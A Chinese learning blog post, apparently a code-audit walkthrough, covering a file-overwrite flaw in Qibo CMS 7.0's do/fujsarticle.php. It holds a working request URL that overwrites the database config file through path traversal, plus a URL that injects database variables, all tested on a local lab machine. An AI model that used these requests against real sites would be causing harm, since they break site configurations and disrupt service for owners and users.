齐博 php7,PHP代码审计理解(二)----齐博CMS7.0文件覆盖

0x00 前言

因为我是跟着视频操作的,这回真的没理解为什么定位到了这个存在漏洞的文件。。。 /do/fujsarticle.php

因为没有前文,所以这里无法分析这个$FileName为什么可以$_GET传值,此处我只看结果。

后来看的时候发现可以逆推过来,应该是本来有哪个功能用到fujsarticle.php文件,这里就不纠结了。

0e2a483de3fa14730fba5e6ec45190b9.png

0x01 操作

在包含全局配置文件前后输出一下这个变量$FileName。

008fa1f4656b5b7644e9c54e8727af2c.png

f4e6f9ecd48e24dfb3bcfda35cea2863.png

可以看到文件包含后的变量被改写了,test.php写入成功。可以看到do文件夹下会生成一个文件,内容与你选的type有关。

88a12305d6408621e81be18e8c50e984.png

意思就是可以任意生成文件,但不能自定义其内容,并且是覆盖性质的,[w]写入新文件。这里就可以去覆盖掉重要的配置文件,使其失去初始化配置。比如说,我们的数据库初始文件。

C:\phpStudy\PHPTutorial\WWW\qibo_v7\data\mysql_config.php

/**

* 以下变量需根据您的服务器说明档修改

*/

$dbhost = 'localhost'; // 数据库服务器(一般不必改)

$dbuser = 'root'; // 数据库用户名

$dbpw = 'root'; // 数据库密码

$dbname = 'qibo7'; // 数据库名

$pre='qb_'; // 网站表区分符

$database = 'mysql'; // 数据库类型(一般不必改)

$pconnect = 0; // 数据库是否持久连接(一般不必改)

$dbcharset = 'gbk'; // 数据库编码,如果出现网页乱码,你可以尝试改为gbk或latin1或utf8或big5,即可解决

?>

可以看到,这样操作后,数据库连接受到破坏,已经不能正常访问网站。

http://192.168.79.147/qibo_v7/do/fujsarticle.php?type=pic&FileName=../data\mysql_config.php

e30ccf3d7cde00631e31b2f5571cda0c.png

68ff20bd01a7e74257a1bafdd427211e.png

我们可以打开该配置文件看看

5b3d5c3dc3f0777ea04cdf33e8b8083e.png

接下来是写入变量,重新写入数据库连接的变量。

http://192.168.79.147/qibo_v7/index.php?dbhost=localhost&dbuser=root&dbpw=root&dbname=qibo7&pre=qb_&database=mysql&pconnect=0&dbcharset=gbk

这里是设置连接数据库的ip和口令,及数据库名,类型等。

理论上来讲我们是可以用自己建的数据库去替代,但是这在漏洞利用中有些鸡肋,因为,即便如此,你也无法获得他本来的数据。

c96de02103082a70415aa24da19592be.png

然鹅!这真的不是很可用的漏洞,你在访问其他的页面时还得每次都赋值,因为这些变量不会写到配置文件中去。

85ec19e68d02ec9754a16dfe39f32186.png

以上,此次学习又让我长见识了啊~

标签:文件,php,CMS7.0,配置文件,齐博,数据库,写入,PHP,变量

来源: https://www.cnblogs.com/foe0/p/12048352.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值